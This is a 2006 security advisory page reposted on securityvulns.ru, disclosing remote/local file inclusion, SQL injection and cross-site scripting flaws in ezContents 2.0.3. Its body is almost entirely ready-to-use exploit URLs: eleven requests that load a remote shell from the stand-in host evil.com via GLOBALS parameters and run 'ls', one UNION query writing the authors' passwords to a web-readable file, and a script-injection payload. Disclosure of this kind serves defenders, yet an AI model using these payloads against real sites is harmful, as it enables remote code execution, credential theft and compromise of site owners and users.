Computer Security

Security Advisory: ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path])
Multiple Remote File Inclusion

  [SA21659] CubeCart Multiple Vulnerabilities

  phpAtm <= 1.21 (include_location
) Remote File Include Vulnerabilities

  YACS CMS <= 6.6.1 context[path_to_root]
Remote File Include Vuln

From:gmdarkfig_(at)_gmail.com <gmdarkfig_(at)_gmail.com>
Date:31.08.2006
Subject:ezContents Version 2.0.3 Remote/Local File Inclusion, SQL Injection, XSS

#
# VulnScr: ezContents Version 2.0.3
# Web....: http://www.ezcontents.org/
#
# Date...: Web July 28 10:44 2006
# Credits: DarkFig (gmdarkfig@gmail.com)
# Vuln...: SQL Injection, Remote/Local File Inclusion, Cross Site Scripting
#

==[ Remote / Local File Inclusion
=================================
http://[...]/modules/diary/event_list.
php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/calendar/calendar.
php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.
php&cmd=ls
http://[...]/modules/gallery/gallery_summary.
php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/guestbook/showguestbook.
php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/links/showlinks.
php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/news/shownews.
php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.
php&cmd=ls
http://[...]/modules/poll/showpoll.
php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.
php&cmd=ls
http://[...]/modules/reviews/review_summary.
php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
http://[...]/modules/search/search.
php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.
php&cmd=ls
http://[...]/modules/toprated/toprated.
php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.
php&cmd=ls
http://[...]/modules/whatsnew/whatsnew.
php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.
php&cmd=ls

==[ SQL Injection
=================
http://[...]/headeruserdata.php?groupname=' UNION SELECT userpassword FROM authors INTO OUTFILE '/www/passwd.txt' #


==[ Cross Site Scripting
========================
http://[...]/loginreq2.
php?subgroupname="><script>alert(666)</script>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server